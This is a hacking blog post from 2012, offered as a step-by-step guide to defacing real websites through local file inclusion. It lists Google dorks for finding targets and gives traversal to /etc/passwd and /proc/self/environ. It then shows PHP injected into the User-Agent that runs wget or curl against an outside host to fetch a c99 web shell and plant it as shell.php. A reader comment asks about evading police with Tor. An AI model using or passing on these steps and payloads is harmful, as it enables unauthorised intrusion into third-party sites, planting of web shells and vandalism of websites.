BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Wednesday, April 18, 2012

Defacing Website Using Advanced LFI [Full]

1 comments
This type if Exploitation is generally know as LFI Exploitation via /proc/self/environ. Its is much more advanced than exploiting using /etc/passwd.
So lets Begin 



LFI (Local File Inclusion)

There are some requirements before you start to deface a website using LFI:
1.Download Firefox.
2.Download Tamper Data addon for firefox - https://addons.mozilla.org/sv-se/fir...n/tamper-data/

Finding Vulnerable Website

You can easily find a vulnerable website just by some googling with the help of dorks:
Code:
inurl:".php?action="
inurl:".php?board="
inurl:".php?cat="
inurl:".php?date="
inurl:".php?detail="
inurl:".php?dir="
inurl:".php?download="
inurl:".php?fille="
inurl:".php?get="
inurl:".php?info="
If you want more dorks then just goto http://google.com or http://pastebin.com and search for LFI Dorks.

Test For Vulnerability
Now lets suppose you have chosen your website.Next task is to test wether the site is vulnerable or not,See below on how to test it:

Suppose you have found a website - http://www.site.com/index.php?cat=home.php
To test for its vulnerability, just replace home.php with any random word like 12, and if you get error on the page then the site is vulnerable. See below Image to see how a vulnerable site looks like:

If you get this type of error, then your website is vulnerable. You can now proceed to deface it!

Pre-Exploitation
So now our target website is http://www.site.com/index.php?cat=home.php
Now, we will use old traditional method to find that where can we upload our shell to deface the website.
To Find the injection path:
Replace home.php with ../etc/passwd
If the website seems to be normal then again put a "../" before "../etc/passwd" [without quotes] now if again you see that the site is looking normal then again put a "../" before "../etc/passwd"
so your URL will start looking like http://www.site.com/index.php?cat=../../etc/passwd
Keep doing so untill you get a screen like shown below:

You can see here that i found the exact path after putting 19 "../" before "../etc/passwd".

You have completed half of your exploit:

Now suppose that our injection path looks like - http://www.site.com/index.php?cat=../../../../../../etc/passwd
Now you have to do is that just replace "etc/passwd" with "proc/self/environ" and you will some codes like shown below:



Uploading shell
Now we have to use Tamper Data to edit our user-agent to a bit of php code to execute bash commands. On firefox go to tools , Tamper Data then click start tamper.Then go to your URL and click tamper:


Now from here on, we can execute bash commands with a little bit of php code. Just Replace your user agent in the following screen with this piece of code:
Code:
<?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?>


OR


Code:
<?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?>


Where http://www.sh3ll.org/c99.txt is the site were you have hosted your shell in TXT format
Example:


Now click "OK"

When Done, Navigate to the shell by going to - http://www.site.com/shell.php and you will see something like below:


This is your shell and from here on you can deface the whole website!
It took me a lot of time to write this tutorial, a "thank" is very much appreciated!

GoodLuck

©2012, copyright BLACK BURN

1 comments:

  1. This is illegal, are police going to trace me down? Should I use Tor?

    ReplyDelete

 

7 Years Earning Experience

The Earning Source You Can Trust